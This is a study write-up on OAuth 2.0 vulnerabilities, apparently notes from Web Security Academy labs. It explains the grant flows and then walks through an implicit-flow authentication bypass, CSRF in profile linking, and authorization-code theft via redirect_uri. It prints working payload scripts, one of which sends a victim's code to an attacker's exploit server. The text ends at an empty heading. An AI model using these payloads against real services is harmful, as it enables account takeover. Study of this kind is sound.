# OAuth 2.0 authentication vulnerabilities # Basic Concept Oauth was designed to share data between different application. ## OAuth 2.0 Framework component - Client application - Resource Owner - Oauth Platform: **The Authentication server the grant token and management interaction between the client application and Source owner.** OAuth2.0 Methodology OAuth uses APIs to interact with the Authentication Server and the Resource Server. ## Oauth Flows In the OAuth process, the Client Application needs to obtain a token from the Authorization Server before it can access resources on the Resource Server.  ## OAuth Scope When client application need to access user data from Oauth Platform, they use scope parameter to specify what resource they want to retrieve Scope Example ``` scope=user scope=user.meowhecker scope=user-list scope=https://oauth-authorization-server.com/auth/scopes/user/username.readonly ``` ## Authorization code grant type Authorization code grant is a kind of Outh2.0 type  Step 1,2,3,4 -> Client To Server Step 5,6,7,8,9 -> Server To Server ### Auth Request ``` GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 Host: oauth-authorization-server.com ``` Parameter Analysis **Client_id** -> Required (unique Value) Client_id be generated when client application register toward Auth server **Redirect_url** (Attack Surface!) when client application received auth code, client application will redirect our route to specify Value. **Response_type** Tell the Outh2.0 Platform what kind of grant type that was expected ! Code = Authentication Code Grant **Scope** Used to specify which subset of the user's data the client application wants to access. **State** Passing a unique value that is tied to current session It like CSRF Token. making sure that the request to its /callback endpoint(redirect URL) is from the same person who initiated the OAuth flow. ### User login and consent Login -> User Identification consent -> Scope ### Authentication Code Grant When client application received Auth Code. it will execute callback function ``` GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1 Host: client-app.com ``` code -> Auth Code ### Access Token Request AuthCode To Access Token ``` POST /token HTTP/1.1 Host: oauth-authorization-server.com … client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8 ``` client_secret **Client_secret** (Store in Client application ) was assigned when registering with Oauth Server **Authorization_code** Make sure the new application endpoint knows which grant type is Authentication code ### Access Token Grant The OAuth service will validate the access token request. If everything is as expected, the server responds by granting the client application an access token with the requested scope. ```jsonld { "access_token": "z0y9x8w7v6u5", "token_type": "Bearer", "expires_in": 3600, "scope": "openid profile", … } ``` access_token, scope ### API Call ``` GET /userinfo HTTP/1.1 Host: oauth-resource-server.com Authorization: Bearer z0y9x8w7v6u5 ``` ### Resource grant ``` { "username":"carlos", "email":"carlos@carlos-montoya.net", … } ``` In the case of OAuth authentication, it will typically be used as an ID to grant the user an authenticated session, effectively logging them in. ## Implicit grant  Implicit grant type is far less secure, because all communication is browser to server. it's easily be modify by client side. Implicit grant usually be use to single or desktop application. The Reason is those type application didn't have back-end to store the client_secret in database ! ### Authentication Request ``` GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=token&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 Host: oauth-authorization-server.com ``` response_type = "Token" Tell Oauth used Implicit grant to verify the user identification. ### User login and consent This process is exactly the same as for the authorization code flow. ### Access token grant ``` GET /callback#access_token=z0y9x8w7v6u5&token_type=Bearer&expires_in=5000&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 Host: client-app.com ``` ### API Call Unlike in the authorization code flow, this also happens via the browser. ``` GET /userinfo HTTP/1.1 Host: oauth-resource-server.com Authorization: Bearer z0y9x8w7v6u5 ``` ### Resource grant ```jsonld { "username":"carlos", "email":"carlos@carlos-montoya.net" } ``` # Identification Depending on the grant type(Implicit grant), we have opportunity to intercept sensitive data. Recon ``` Stander Endpoints /.well-known/oauth-authorization-server /.well-known/openid-configuration ``` Look up response or Document ## Exploiting OAuth2.0 vulnerabilities Vulnerabilities can arise in the client application's implementation of OAuth as well as in the configuration of the OAuth service itself. ## LAB - Client Application didn't check Victim Information carlos carlos@carlos-montoya.net. Our Valid Credential wiener:peter. ### Authentication Request The user is redirected to the authentication server to initiate the OAuth 2.0 authorization process. Initial Request:    ``` Location: /interaction/{ClientID} ``` ### User login / consent URL: /oauth2.0-Server/interaction/ -> Handle user interaction for Oauth2.0 Authentication.  /interaction/TMVibu4QyWdNsbiFrPYGj/login  /interaction/{ClientID}/confirm  Response ``` Location: https://oauth-0a24004c044930d280e8478c02fe001c.oauth-server.net/auth/{ClientID} ``` ### Authorization Server Response After the user finishes identification and verification, the authorization server sends back an access token.  Response ``` Location: https://0a6b009d041b30ed80aa49ca00a00021.web-security-academy.net/oauth-callback#access_token=2LHKsCtcrsn614znZsRfdEUAczuWPH68GgRB1KMW-20&expires_in=3600&token_type=Bearer&scope=openid%20profile%20email ``` The Url will carry the Access Token -> And redirect to Callback URL ## Callback URL (Handling the Access Token) The client retrieves user data from the OAuth resource endpoint using the access token.   CallBack.js ```javascript= <script> const urlSearchParams = new URLSearchParams(window.location.hash.substr(1)); const token = urlSearchParams.get('access_token'); fetch('https://oauth-0ab500ed0437d24280056a1d02d50096.oauth-server.net/me', { method: 'GET', headers: { 'Authorization': 'Bearer ' + token, 'Content-Type': 'application/json' } }) .then(r => r.json()) .then(j => fetch('/authenticate', { method: 'POST', headers: { 'Accept': 'application/json', 'Content-Type': 'application/json' }, body: JSON.stringify({ email: j.email, username: j.sub, token: token }) }).then(r => document.location = '/')) </script> ```  ### API Call (User Information) Callback.js : Fetch Function-> /oauth-0a24004c044930d280e8478c02fe001c.oauth-server.net/me  Response {"sub":"wiener","name":"Peter Wiener","email":"wiener@hotdog.com","email_verified":true} ### Web site Login endpoint /Authentication    Session -> OucFwZbUuMl9Mm8fYtMl489F63UnN8Yr Session = username + email + Token username/email/token form Outh Server client Application didn't check whether the tokes is match username and email Solved!!! ## Flawed CSRF Protection Many Components of the Oauth flows are optional. Some of them are strongly recommended unless unless there's an important reason not to use them. e.g. state parameter! . If an application lacks an unpredictable value (such as the state parameter) to protect against CSRF , This allows attacker to exploit Oauth functionalities to perform CSRF Attack. ### LAB:No CSRF Protection in OAuth Profile Linking #### Website Account Login Flow Login in by Social Account GET /interaction/pz9ZSssJpgLnW-MGT-5km  /interaction/pz9ZSssJpgLnW-MGT-5km/login  #### Authorization Request: GET /auth/pz9ZSssJpgLnW-MGT-5km  GET /interaction/pz9ZSssJpgLnW-MGT-5km #### Confirm Interaction POST /interaction/pz9ZSssJpgLnW-MGT-5km/confirm    ### Social Profile linking Lack CSRF protection GET /oauth-linking?code=SXDhWz1CftF6Gt_k7sL4DDonZ8_OmMvx4nD3_jF2YIy - This URL allows the attacker to attach a website account to a social account. - The URL does not contain a CSRF token.  #### Exploit it To exploit this vulnerability, we can drop the OAuth linking check and pass the following payload to the victim. If victim their session cookie is valid. the attacker can link the victim's website account with the attacker's social account. Deliver Payload to victim ```javascript= <script>window.location.href = "https://0a6b008f038cfdef8076309e0071003d.web-security-academy.net/oauth-linking?code=opYuDxMO5QYrDjXj6xUtRQxBGMkd9yD8BQENyoIyv-t"</script> ``` Log out current account and login into our social account Now, our username is administrator !  Solved! ## Leaking authorization codes and access tokens The issue occur when the server didn't check the redirect_url property, It allow the attacker induce the server send the Authenticate code to Attacker Server ! ### LAB: Leak Authentication Code via redirect_url Parameter   ### Identify Attempting induce the client application send request to our C2  We received leak credential !  #### Exploit ``` <script>window.location.href = "https://oauth-0a99005303237533833cdf3b02db00d9.oauth-server.net/auth?client_id=azbjs8kshdlj73ex34dla&redirect_uri=https://exploit-0af60079033675928319e02b011c00c8.exploit-server.net/oauth-callback&response_type=code&scope=openid%20profile%20email"</script> ``` /oauth-callback?code=n9GDX7_GQZQISI8oqjyyXiuqU7anX71W1RbbimcU4f8  Attempt Login with this Authentication Code    Solved ### Flawed redirect_uri validation